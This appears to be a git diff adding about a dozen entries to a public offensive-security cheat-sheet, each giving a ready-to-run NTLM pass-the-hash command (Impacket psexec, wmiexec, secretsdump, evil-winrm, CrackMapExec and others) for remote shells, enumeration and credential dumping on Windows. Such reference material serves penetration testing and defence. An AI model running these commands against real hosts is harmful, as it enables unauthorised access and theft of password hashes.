WADComs · dipakpanchal05 · Aug 13, 2025
diff --git a/_wadcoms/crackmapexec.md b/_wadcoms/crackmapexec.md
@@ -0,0 +1,29 @@
+---
+description: Use CrackMapExec to perform SMB authentication with NTLM Pass-the-Hash against a subnet, enumerating SMB shares or verifying credentials.
+
+Command Reference:
+    Target IP: 10.10.10.1/24
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  crackmapexec smb 10.10.10.1/24 -u john -H 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396
+
+items:
+  - Hash
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+
+references:
+  - https://github.com/byt3bl33d3r/CrackMapExec
+  - https://www.ired.team/offensive-security/lateral-movement/using-crackmapexec
+---
diff --git a/_wadcoms/evil-winrm.md b/_wadcoms/evil-winrm.md
@@ -0,0 +1,31 @@
+---
+description: Authenticate to a remote Windows host over WinRM using NTLM Pass-the-Hash and obtain an interactive PowerShell session.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  evil-winrm -i 10.10.10.1 -u john -H 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396
+
+items:
+  - Hash
+  - Shell
+  - PowerShell
+
+services:
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Exploitation
+
+references:
+  - https://github.com/Hackplayers/evil-winrm
+  - https://book.hacktricks.xyz/windows-hardening/evil-winrm
+  - https://docs.microsoft.com/en-us/windows/win32/winrm/portal
+---
diff --git a/_wadcoms/impacket-atexec.md b/_wadcoms/impacket-atexec.md
@@ -0,0 +1,28 @@
+---
+description: Schedule a task remotely over SMB using Impacket's atexec with NTLM Pass-the-Hash to execute a command.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-atexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 [email protected] "whoami"
+
+items:
+  - Hash
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Exploitation
+
+references:
+  - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-lookupsid.md b/_wadcoms/impacket-lookupsid.md
@@ -0,0 +1,29 @@
+---
+description: Enumerate domain SIDs and associated usernames using Impacket's lookupsid.py with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: test.local
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-lookupsid -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/[email protected]
+
+items:
+  - Hash
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+
+references:
+  - https://github.com/fortra/impacket
+  - https://attack.mitre.org/techniques/T1087/
+---
diff --git a/_wadcoms/impacket-psexec.md b/_wadcoms/impacket-psexec.md
@@ -0,0 +1,32 @@
+---
+description: Execute commands on a remote Windows host as Administrator over SMB using Impacket's psexec with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-psexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 [email protected]
+
+items:
+  - Hash
+  - Shell
+  - Powershell
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Exploitation
+
+references:
+  - https://github.com/fortra/impacket
+  - https://www.hackingarticles.in/a-little-guide-to-impacket/
+  - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
+---
diff --git a/_wadcoms/impacket-rpcdump.md b/_wadcoms/impacket-rpcdump.md
@@ -0,0 +1,30 @@
+---
+description: Enumerate RPC services on a remote Windows machine using Impacket's rpcdump with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: test.local
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-rpcdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/[email protected]
+
+items:
+  - Hash
+  - Enumeration
+
+services:
+  - RPC
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Pass-the-Hash
+  - Enumeration
+
+references:
+  - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-samrdump.md b/_wadcoms/impacket-samrdump.md
@@ -0,0 +1,28 @@
+---
+description: Enumerate user accounts and groups from the SAM database over RPC using Impacket's samrdump with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: test.local
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-samrdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/[email protected]
+
+items:
+  - Hash
+
+services:
+  - RPC
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+
+references:
+  - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-secretsdump.md b/_wadcoms/impacket-secretsdump.md
@@ -0,0 +1,29 @@
+---
+description: Dump password hashes and secrets from a remote Windows machine using Impacket's secretsdump with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-secretsdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 [email protected]
+
+items:
+  - Hash
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+  - PrivEsc
+
+references:
+  - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/impacket-smbclient.md b/_wadcoms/impacket-smbclient.md
@@ -0,0 +1,30 @@
+---
+description: Use Impacket's smbclient to connect to SMB shares on a Windows host using NTLM Pass-the-Hash authentication.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: test.local
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-smbclient -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/[email protected]
+
+items:
+  - Hash
+  - SMB
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+
+references:
+  - https://github.com/fortra/impacket
+  - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/impacket-smbexec.md b/_wadcoms/impacket-smbexec.md
@@ -0,0 +1,31 @@
+---
+description: Execute commands remotely over SMB using Impacket's smbexec with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-smbexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 [email protected]
+
+items:
+  - Hash
+  - Shell
+  - PowerShell
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Exploitation
+
+references:
+  - https://github.com/fortra/impacket
+  - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---
diff --git a/_wadcoms/impacket-wmiexec.md b/_wadcoms/impacket-wmiexec.md
@@ -0,0 +1,31 @@
+---
+description: Execute commands remotely over WMI on a Windows host using Impacket's wmiexec with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  impacket-wmiexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 [email protected]
+
+items:
+  - Hash
+  - Shell
+  - PowerShell
+
+services:
+  - WMI
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Exploitation
+  - Persistence
+
+references:
+  - https://github.com/fortra/impacket
+---
diff --git a/_wadcoms/pth-curl.md b/_wadcoms/pth-curl.md
@@ -0,0 +1,28 @@
+---
+description: Download files from a remote server using curl with NTLM Pass-the-Hash authentication.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: N/A
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  pth-curl --ntlm -u john:580B16D486D8D2CAFA00B314D41FA396 http://10.10.10.1/secret.txt
+
+items:
+  - Hash
+
+services:
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+
+references:
+  - https://curl.se/docs/manual.html
+  - https://github.com/byt3bl33d3r/pth-toolkit
+---
diff --git a/_wadcoms/pth-net.md b/_wadcoms/pth-net.md
@@ -0,0 +1,30 @@
+---
+description: Enumerate SMB shares on a remote machine using the net rpc share list command with NTLM Pass-the-Hash.
+
+Command Reference:
+    Target IP: 10.10.10.1
+    Domain: test.local
+    Username: john
+    Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash)
+
+command: |
+  pth-net rpc share list -U 'test.local\john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396' -S 10.10.10.1
+
+items:
+  - Hash
+
+services:
+  - SMB
+  - NTLM
+
+OS:
+  - Windows
+
+attack_types:
+  - Enumeration
+
+references:
+  - https://www.samba.org/samba/docs/current/man-html/net.8.html
+  - https://github.com/byt3bl33d3r/pth-toolkit
+  - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
+---